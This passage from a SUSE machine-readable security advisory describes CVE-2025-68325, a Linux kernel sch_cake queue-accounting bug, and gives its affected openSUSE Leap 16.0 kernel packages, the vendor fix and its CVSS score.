"title": "CVE-2025-68320"
},
{
"cve": "CVE-2025-68325",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68325"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_cake: Fix incorrect qlen reduction in cake_drop\n\nIn cake_drop(), qdisc_tree_reduce_backlog() is used to update the qlen\nand backlog of the qdisc hierarchy. Its caller, cake_enqueue(), assumes\nthat the parent qdisc will enqueue the current packet. However, this\nassumption breaks when cake_enqueue() returns NET_XMIT_CN: the parent\nqdisc stops enqueuing current packet, leaving the tree qlen/backlog\naccounting inconsistent. This mismatch can lead to a NULL dereference\n(e.g., when the parent Qdisc is qfq_qdisc).\n\nThis patch computes the qlen/backlog delta in a more robust way by\nobserving the difference before and after the series of cake_drop()\ncalls, and then compensates the qdisc tree accounting if cake_enqueue()\nreturns NET_XMIT_CN.\n\nTo ensure correct compensation when ACK thinning is enabled, a new\nvariable is introduced to keep qlen unchanged.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68325",
"url": "https://www.suse.com/security/cve/CVE-2025-68325"
},
{
"category": "external",
"summary": "SUSE Bug 1255417 for CVE-2025-68325",
"url": "https://bugzilla.suse.com/1255417"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
